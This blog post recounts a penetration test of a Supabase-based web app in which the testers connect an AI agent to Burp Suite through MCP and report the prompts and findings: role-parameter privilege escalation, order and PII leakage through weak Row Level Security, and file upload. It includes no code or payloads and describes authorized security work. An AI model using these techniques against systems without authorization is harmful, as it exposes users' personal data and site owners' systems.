How we used Burpsuite MCP with Antigravity AI to exploit a Supabase based Application

As we all know, AI is shifting Bug Bounty and Web App Pentesting for good; people are worried about AI replacing Bug Bounty and their pentesting jobs. So, we thought, why not use AI together to find bugs in a company? We already know the basic stuff; AI will just help us to automate it faster. So, in this article, we will show you how we used BurpSuite MCP with Antigravity, yes, the free Google AI one (Gemini Flash 3), to exploit a Supabase based application.

Before we begin, our goal is not to use or tell AI to hack an unauthorized company. The application we tried this on a Pentest Project; we just wanted to see if AI could find any bugs because apparently, we thought the system was secured as it was under Supabase.

Phase 1: Building the Context for AI (Manual Exploration)

Our goal was to manually test all endpoints, basically all pages and features available on the targeted website. This is because the more you store in Burp Suite's HTTP History, the more context your AI has to think. So we did a thorough Manual Exploration on the website by navigating every path, interacting with every button, and utilizing all authorized functionalities.

We populated Burp Suite's HTTP History and Logger.

This provided the "knowledge" for the AI to think: a complete map of requests, headers, and state changes.

Phase 2: The Bridge (Antigravity & Burp's MCP)

We first installed the Burp Extension MCP Server and configured it with Antigravity's AI.

To verify the connection, we started with a simple sanity check:

Prompt: "__List five entries from the HTTP history."

Once it confirmed the traffic, we tested its ability to interact with Burp's tools:

Prompt: "__Before we start, can you create a Repeater tab or send a normal request?"

With the bridge confirmed, the AI was no longer just a chatbot; it was continuously talking to us and was also connected to Burp at the same time.

Phase 3: Scoping and Priming

We defined the boundaries clearly, providing the AI with the target domains. Our goal was to focus on a Supabase focused pentest, looking specifically for common misconfigurations like Row Level Security (RLS) bypasses or exposed debug routes.

Prompt: "We have three URLs in scope. This is a Supabase app we built… Please deep‑crawl or study the existing history, read any JS bundles, find all endpoints, do threat modeling, and then perform a Supabase‑focused pentest."

Phase 4: The Pivot (Moving Beyond False Positives)

Initially, the AI flagged a classic Stored XSS. Upon manual verification, it turned out to be a false positive; the output was properly encoded in the final render. The AI "assumed" the payload worked as it saw a "200" HTTP success, but it couldn't verify it in the backend since we didn't have admin credentials.

After this, we provided legitimate test credentials (a normal user account). Using our credentials, the AI found these table names:

Phase 5: The Exploitation

Once the AI understood the API's behavior, it began finding severe architectural flaws. The most critical discovery was a Privilege Escalation bug: an authenticated user could modify their own role parameter in a PATCH request to gain Admin access.

We manually tested it using curl and confirmed the vulnerability.

We made a bash script that performs basic queries to several API endpoints like products, orders, profiles, and so on. It takes the anon key (API key) and checks what RLS allows and disallows. It then attempts to manipulate them using all HTTP Methods.

Prompt: "Now that you found privilege escalation to admin, can you re-run these checks and report how many API endpoints are exploitable using the bash script I provided?"

Antigravity was able to find a Data Leakage for all orders, and we confirmed it manually using a curl command.

It was also able to find PII data for many users, and as you can see, we confirmed this with curl as well.

Lastly, it was also able to perform an Read/Write operation basically, by uploading a txt file as a Bug Bounty hunter would.

We confirmed this using curl and manually navigating to the browser, and the file did exist.

So, summarizing the findings using Antigravity AI, we basically found all these:

The Report:

Here's the link to the chat history: https://tinyurl.com/chat-history-md

A quick note: The prompt that was used in the report was written in a proper formal way. You can check the raw logs for the actual PROMPT.

The Pentest was conducted by Jawad Mahdi / Zabir Abdullah / Mirash Ahmed Chowdhury